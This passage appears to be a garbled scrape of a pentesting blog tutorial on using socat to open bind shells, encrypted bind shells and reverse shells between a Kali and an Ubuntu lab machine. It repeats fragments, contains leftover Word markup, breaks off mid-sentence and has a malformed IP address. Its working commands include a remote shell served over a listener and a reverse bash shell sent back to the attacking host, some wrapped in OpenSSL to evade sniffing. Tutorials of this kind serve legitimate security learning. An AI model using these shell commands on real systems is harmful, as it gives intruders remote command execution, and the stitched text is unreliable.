Here, we will be using the socat to create a listener on port 5555 on our Ubuntu machine. As soon as we execute the presented command, a listener will be created on the port and will be waiting for an incoming connection. Here we are running the socat command with the -d -d command that will print the fatal, errors, warnings, or notices. Then we have the Address Type as TCP4, followed by the Facility that we want to purpose such as LISTEN. Then we have the Port Number separated by the: and the type of shell that we want to provide to the guest.<o:p socat -d -d TCP4-LISTEN:5555 EXEC:/bin/bash<v:shapetype<v:stroke<v:formulas<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:path<o:lock<v:shape<v:imagedata<o:p https://1.bp.blogspot.com/-xinqruY0ew4/YQOqVEtz6bI/AAAAAAAAx_k/18bKOpKO6-8bhvpjMt7q9WyQsw-3IJk0gCLcBGAsYHQ/s16000/5.png Moving on to our other machine, i.e., Kali Linux to connect to our Ubuntu machine on which we have created a listener. We need to know the IP Address and the Port number on which the listener is running on. We have provided the Address Type, IP Address, and the [...]
Socat for Pentester
Socat is one of those kinds of tools that either you might not know at all, or if you know then you might know all the different kinds of stuff that you can do with it. While working with it, we felt that there are guides for socat but none of them strike the right balance between the introduction and variety. This article will serve as the introduction if you have not heard about socat and as an advance if you already know something about it without being jarring. Table of Content<o:p· Introduction<o:po What is Socat?<o:p
o Usage of Socat<o:p
o Netcat v/s Socat<o:p
· Bind Shell<o:p· Encrypted Bind Shell<o:p· Reverse Shell<o:p· Encrypted Reverse Shell<o:p· Port Forwarding<o:p· File Transfer<o:p· Conclusion<o:pIntroduction<o:pWhat is Socat?<o:pIn a general sense, socat is a relay that can be used for data transfer in both directions between two data channels independently. These data channels can be in a form of a file, pipe, device (serial line, etc. or a pseudo-terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin, etc.), the GNU line editor (readline), a program, or a combination of two of these. <o:p Usage of Socat<o:psocat provides a wide range of tasks that it can be used for. Let’s take an example, Socat can be used as a TCP port forwarder, as an external socksifier, for attacking weak firewalls, as a shell interface to UNIX sockets or an IP6 relay, for redirecting TCP oriented programs to a serial line, or to logically connect serial lines on different computers, as well as to establish a secure environment for running client or server shell scripts with network connections. <o:p Netcat V/s Socat<o:pWe all have been using Netcat for a long time ago. It has been the daily driver for many penetration testers since its initial development. It is praised as it is easy to use and it can write or read data over network connections using the TCP and UDP. Now, let’s talk about Socat. As we discussed earlier it is a relay that can be used bidirectionally. Some features are provided by Socat such as establishing Multiple connections, creating a secure channel, support of more protocols such as OpenSSL, SCTP, Socket, Tunnel, etc.<o:p Bind Shell<o:pIn a general sense, a bind shell opens up a port on the remote machine that is expecting and waiting for an incoming connection. Once the user connects to the listener, a shell is provided to the user to interact. <o:p
Here, we will be using the socat to create a listener on port 5555 on our Ubuntu machine. As soon as we execute the presented command, a listener will be created on the port and will be waiting for an incoming connection. Here we are running the socat command with the -d -d command that will print the fatal, errors, warnings, or notices. Then we have the Address Type as TCP4, followed by the Facility that we want to purpose such as LISTEN. Then we have the Port Number separated by the: and the type of shell that we want to provide to the guest.<o:p socat -d -d TCP4-LISTEN:5555 EXEC:/bin/bash<v:shapetype<v:stroke<v:formulas<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:f<v:path<o:lock<v:shape<v:imagedata<o:p https://1.bp.blogspot.com/-xinqruY0ew4/YQOqVEtz6bI/AAAAAAAAx_k/18bKOpKO6-8bhvpjMt7q9WyQsw-3IJk0gCLcBGAsYHQ/s16000/5.png Moving on to our other machine, i.e., Kali Linux to connect to our Ubuntu machine on which we have created a listener. We need to know the IP Address and the Port number on which the listener is running on. We have provided the Address Type, IP Address, and the [...]
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Socat for Pentester Socat is one of those kinds of tools that either you might not know at all, or if you know then you might know all the different kinds of stuff that you can do with it. While working with it, we felt…
Port and we will be able to connect to the bash shell as demonstrated below. The main issue with this type of session is the lack of authentication. Any user with a limited amount of information can connect to a shell and execute commands that can affect the enterprise. Apart from the basic lack of authentication, the communication that is being conducted over the Bind Shell is susceptible to sniffing attacks. <o:p socat - TCP4:192.168.168.1.141:5555<o:phttps://1.bp.blogspot.com/-Sq1dDkQY0Hg/YQOqaTnXeII/AAAAAAAAx_o/Qfd-MmPNBxIdGtAso8EXjUyzWGA9p_9BQCLcBGAsYHQ/s16000/6.png <v:shape<v:imagedata<o:p Encrypted Bind Shell<o:pIn the previous section, we talked about the Bind Shell and its lack of security. Now, to make the communication between both the target user and the client user more secure, we can introduce the functionality of encrypting the shell. We will be using the OpenSSL for this activity. When encrypted it will not be possible for any malicious actor in the network to sniff the traffic between both users over a Bind shell. To encrypt using OpenSSL, first, we need to create a key and a certificate associated with it. Here in this demonstration, we are creating a key by the name “bind_shell. the key” and the certificate by the name “bind_shell.crt”. The format of the certificate is x509 and the validity of the certificate is for 362 days. <o:p openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt<o:phttps://1.bp.blogspot.com/-VC5rGUOU8H4/YQOqeWSIxtI/AAAAAAAAx_s/1eTMymDkeP8RG-8g7wlG_MXZAtG6611FgCLcBGAsYHQ/s16000/7.png <v:shape<v:imagedata<o:p
Creating a key and a certificate is not all that is required to encrypt your bind shell. Before moving forward, you are required to use the key and certificate to create a .pem file. This .pem file then can be used to create an encrypted bind shell using socat. We can pipe both the key and certificate using the cat command and make a bind_shell.pem file as demonstrated below. Then we are using the bind_shell.pem file to create a Listener as before but instead of TCP4, we are now using OPENSSL. We created the listener on port 9999. <o:p cat bind_shell.key bind_shell.crt > bind_shell.pem<o:psocat -OPENSSL-LISTEN:9999,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash<o:phttps://1.bp.blogspot.com/-4R8j4fUueJE/YQOqineL2eI/AAAAAAAAx_w/7fAWrfb1lGw5sbky7gz1-uhxVlxIY-VcACLcBGAsYHQ/s16000/8.png <v:shape<v:imagedata<o:p
Now that we have created the listener on port 9999. Let’s use the Kali Linux for connecting to the Bind Shell as we did earlier. We change the Address Type here as well to OPENSSL as shown in the image below. We see that we can connect to the target machine. The difference here is the fact that using OpenSSL we have encrypted the communication between the Kali Machine and the Ubuntu Machine. If there is a malicious actor tried to sniff the traffic between the two machines, they won’t be able to read the contents of the communication.<o:p socat – OPENSSL:192.168.1.141:9999,verify=0<o:phttps://1.bp.blogspot.com/-NwKkRcuonpo/YQOqoyz9wXI/AAAAAAAAx_0/14ugJSft7tk7iFLON5b5NKiPs2cNK7mEwCLcBGAsYHQ/s16000/9.png <v:shape<v:imagedata<o:p Reverse ShellThe term Reverse Shell is derived from the method of its generation. We discussed the bind shell and we saw that there was a listener are running on the Ubuntu Machine and Kali Machine is connecting to that particular listener. But a shell that is generated from the remote machine which in our case the Ubuntu Machine is termed as the remote machine and Kali Machine as the local machine. So, a session is generated from the Ubuntu Machine to Kali Machine. That means that the listener will be running on the Kali machine. It is the type of shell that is usually used for the target machine to comm[...]
Creating a key and a certificate is not all that is required to encrypt your bind shell. Before moving forward, you are required to use the key and certificate to create a .pem file. This .pem file then can be used to create an encrypted bind shell using socat. We can pipe both the key and certificate using the cat command and make a bind_shell.pem file as demonstrated below. Then we are using the bind_shell.pem file to create a Listener as before but instead of TCP4, we are now using OPENSSL. We created the listener on port 9999. <o:p cat bind_shell.key bind_shell.crt > bind_shell.pem<o:psocat -OPENSSL-LISTEN:9999,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash<o:phttps://1.bp.blogspot.com/-4R8j4fUueJE/YQOqineL2eI/AAAAAAAAx_w/7fAWrfb1lGw5sbky7gz1-uhxVlxIY-VcACLcBGAsYHQ/s16000/8.png <v:shape<v:imagedata<o:p
Now that we have created the listener on port 9999. Let’s use the Kali Linux for connecting to the Bind Shell as we did earlier. We change the Address Type here as well to OPENSSL as shown in the image below. We see that we can connect to the target machine. The difference here is the fact that using OpenSSL we have encrypted the communication between the Kali Machine and the Ubuntu Machine. If there is a malicious actor tried to sniff the traffic between the two machines, they won’t be able to read the contents of the communication.<o:p socat – OPENSSL:192.168.1.141:9999,verify=0<o:phttps://1.bp.blogspot.com/-NwKkRcuonpo/YQOqoyz9wXI/AAAAAAAAx_0/14ugJSft7tk7iFLON5b5NKiPs2cNK7mEwCLcBGAsYHQ/s16000/9.png <v:shape<v:imagedata<o:p Reverse ShellThe term Reverse Shell is derived from the method of its generation. We discussed the bind shell and we saw that there was a listener are running on the Ubuntu Machine and Kali Machine is connecting to that particular listener. But a shell that is generated from the remote machine which in our case the Ubuntu Machine is termed as the remote machine and Kali Machine as the local machine. So, a session is generated from the Ubuntu Machine to Kali Machine. That means that the listener will be running on the Kali machine. It is the type of shell that is usually used for the target machine to comm[...]
Hacking Articles Tips Tricks Videos Tutorials
Port and we will be able to connect to the bash shell as demonstrated below. The main issue with this type of session is the lack of authentication. Any user with a limited amount of information can connect to a shell and execute commands that can affect the…
unicate back to the attacking machine. <o:p
In the environments where we have a NAT or a Firewall, the reverse shell might be the only way to gain access to the machine. To communicate between the Kali Machine and the Ubuntu Machine using socat we will first need to start a listener on the Kali machine. It is similar to the command that we ran earlier with bind shell. The difference is the STDOUT added at the end of the command to create a listener for a Reverse Shell.<o:p socat -d -d TCP4-LISTEN:9999 STDOUT<o:phttps://1.bp.blogspot.com/-KOWyNHwwIL4/YQOquHQzV1I/AAAAAAAAyAA/-Yx2hKKx4Z0FmmV0n6Ry_scDOiZTMqrugCLcBGAsYHQ/s16000/15.png <v:shape<v:imagedata<o:p
Now moving to the Ubuntu Machine to start a reverse connection to connect to our listener on the Kali machine. With the Address Type, IP Address, and the Port with the type of connection that you want to establish. We see that the demonstration has the reverse bash shell to the Kali Machine. <o:p socat TCP4:192.168.1.2:9999 EXEC:/bin/bash<o:phttps://1.bp.blogspot.com/-WQ5NjcRWQ1Q/YQOq1vL3T1I/AAAAAAAAyAI/ZR71F2g1GVQnWRwLQRKd9SyaC_G3O3HqgCLcBGAsYHQ/s16000/16.png <v:shape<v:imagedata<o:p
To see and inspect the type of connection that we have from the Ubuntu machine we see that the shell that we receive is a basic bash shell on the Kali Machine that originated from the Ubuntu Machine.<o:p https://1.bp.blogspot.com/-3Kjx9GnTz64/YQOq9fiouNI/AAAAAAAAyAQ/YXSCL0XyQaYcruklTbyu5Hudmg9LKvodgCLcBGAsYHQ/s16000/17.png <v:shape<v:imagedata<o:p Encrypted Reverse Shell<o:pSimilar to the Bind Shell, the Reverse Shell also lack security such as the susceptibility Sniffing Attacks. We will be implementing similar techniques to encrypt the communications upon the Reverse Shell. To encrypt using OpenSSL, first, we need to create a key and a certificate associated with it. Here in this demonstration, we are creating a key by the name “ignite. the key” and the certificate by the name “ignite.crt”. The validity of the certificate is for 1000 days.<o:p openssl req -newkey rsa:2048 -nodes -keyout ignite.key -x509 -days 1000 -subj '/CN=www.ignite.lab/O=Ignite Tech./C=IN' -out ignite.crt<o:phttps://1.bp.blogspot.com/-XwnvW7MPnTg/YQOrDGltlEI/AAAAAAAAyAY/KDFpd_SFThEsLn_AUT4PXcxFKt2SgD5igCLcBGAsYHQ/s16000/20.png <v:shape<v:imagedata<o:p
From our previous assessment, we know that we need to convert the key and the certificate into a .pem file. We will again use the cat command to generate the .pem file.<o:p cat ignite.key ignite.crt > ignite.pem<o:phttps://1.bp.blogspot.com/-laDUKRfJ2Zk/YQOrHb3aJ-I/AAAAAAAAyAg/uCpbvoc9eAQJad-U6QyDrm8p-Q1P0dRUACLcBGAsYHQ/s16000/21.png <v:shape<v:imagedata<o:p
Now that we have the pem file the rest of the process is quite similar to the ones that we did with the encrypted bind shell and the reverse shell sections. We create a listener on the Kali Machine using the OPENSSL as the Address Type and the pem file as demonstrated below.<o:p https://1.bp.blogspot.com/-O0VsbcepGJg/YQOrNvBwqbI/AAAAAAAAyAk/sbPiouK5Ilc6u77sxWcqM0Xn1AJiTF5kACLcBGAsYHQ/s16000/22.png <v:shape<v:imagedata<o:p
Over at the Ubuntu machine, we are assigned to create the reverse shell back to the listener that we created on the Kali machine. We will use the same Address Type i.e., OPENSSL. With the IP Address, Port, and the type of shell that the listener is expecting. <o:p https://1.bp.blogspot.com/-frAzGI0fAfQ/YQOrTJ0mt9I/AAAAAAAAyAs/VfooLVqMXGcL-hRRXS6VyGDxZMUu2p5EwCLcBGAsYHQ/s16000/23.png <v:shape<v:imagedata<o:p
Let’s check the functionality of the shell. But while we are doing so, we will also capture the traffic between the Ubuntu Machine and Kali Machine with the help of Wireshark. We will then analyze the traffic to see if we were able to sniff the communication. We are reading t[...]
In the environments where we have a NAT or a Firewall, the reverse shell might be the only way to gain access to the machine. To communicate between the Kali Machine and the Ubuntu Machine using socat we will first need to start a listener on the Kali machine. It is similar to the command that we ran earlier with bind shell. The difference is the STDOUT added at the end of the command to create a listener for a Reverse Shell.<o:p socat -d -d TCP4-LISTEN:9999 STDOUT<o:phttps://1.bp.blogspot.com/-KOWyNHwwIL4/YQOquHQzV1I/AAAAAAAAyAA/-Yx2hKKx4Z0FmmV0n6Ry_scDOiZTMqrugCLcBGAsYHQ/s16000/15.png <v:shape<v:imagedata<o:p
Now moving to the Ubuntu Machine to start a reverse connection to connect to our listener on the Kali machine. With the Address Type, IP Address, and the Port with the type of connection that you want to establish. We see that the demonstration has the reverse bash shell to the Kali Machine. <o:p socat TCP4:192.168.1.2:9999 EXEC:/bin/bash<o:phttps://1.bp.blogspot.com/-WQ5NjcRWQ1Q/YQOq1vL3T1I/AAAAAAAAyAI/ZR71F2g1GVQnWRwLQRKd9SyaC_G3O3HqgCLcBGAsYHQ/s16000/16.png <v:shape<v:imagedata<o:p
To see and inspect the type of connection that we have from the Ubuntu machine we see that the shell that we receive is a basic bash shell on the Kali Machine that originated from the Ubuntu Machine.<o:p https://1.bp.blogspot.com/-3Kjx9GnTz64/YQOq9fiouNI/AAAAAAAAyAQ/YXSCL0XyQaYcruklTbyu5Hudmg9LKvodgCLcBGAsYHQ/s16000/17.png <v:shape<v:imagedata<o:p Encrypted Reverse Shell<o:pSimilar to the Bind Shell, the Reverse Shell also lack security such as the susceptibility Sniffing Attacks. We will be implementing similar techniques to encrypt the communications upon the Reverse Shell. To encrypt using OpenSSL, first, we need to create a key and a certificate associated with it. Here in this demonstration, we are creating a key by the name “ignite. the key” and the certificate by the name “ignite.crt”. The validity of the certificate is for 1000 days.<o:p openssl req -newkey rsa:2048 -nodes -keyout ignite.key -x509 -days 1000 -subj '/CN=www.ignite.lab/O=Ignite Tech./C=IN' -out ignite.crt<o:phttps://1.bp.blogspot.com/-XwnvW7MPnTg/YQOrDGltlEI/AAAAAAAAyAY/KDFpd_SFThEsLn_AUT4PXcxFKt2SgD5igCLcBGAsYHQ/s16000/20.png <v:shape<v:imagedata<o:p
From our previous assessment, we know that we need to convert the key and the certificate into a .pem file. We will again use the cat command to generate the .pem file.<o:p cat ignite.key ignite.crt > ignite.pem<o:phttps://1.bp.blogspot.com/-laDUKRfJ2Zk/YQOrHb3aJ-I/AAAAAAAAyAg/uCpbvoc9eAQJad-U6QyDrm8p-Q1P0dRUACLcBGAsYHQ/s16000/21.png <v:shape<v:imagedata<o:p
Now that we have the pem file the rest of the process is quite similar to the ones that we did with the encrypted bind shell and the reverse shell sections. We create a listener on the Kali Machine using the OPENSSL as the Address Type and the pem file as demonstrated below.<o:p https://1.bp.blogspot.com/-O0VsbcepGJg/YQOrNvBwqbI/AAAAAAAAyAk/sbPiouK5Ilc6u77sxWcqM0Xn1AJiTF5kACLcBGAsYHQ/s16000/22.png <v:shape<v:imagedata<o:p
Over at the Ubuntu machine, we are assigned to create the reverse shell back to the listener that we created on the Kali machine. We will use the same Address Type i.e., OPENSSL. With the IP Address, Port, and the type of shell that the listener is expecting. <o:p https://1.bp.blogspot.com/-frAzGI0fAfQ/YQOrTJ0mt9I/AAAAAAAAyAs/VfooLVqMXGcL-hRRXS6VyGDxZMUu2p5EwCLcBGAsYHQ/s16000/23.png <v:shape<v:imagedata<o:p
Let’s check the functionality of the shell. But while we are doing so, we will also capture the traffic between the Ubuntu Machine and Kali Machine with the help of Wireshark. We will then analyze the traffic to see if we were able to sniff the communication. We are reading t[...]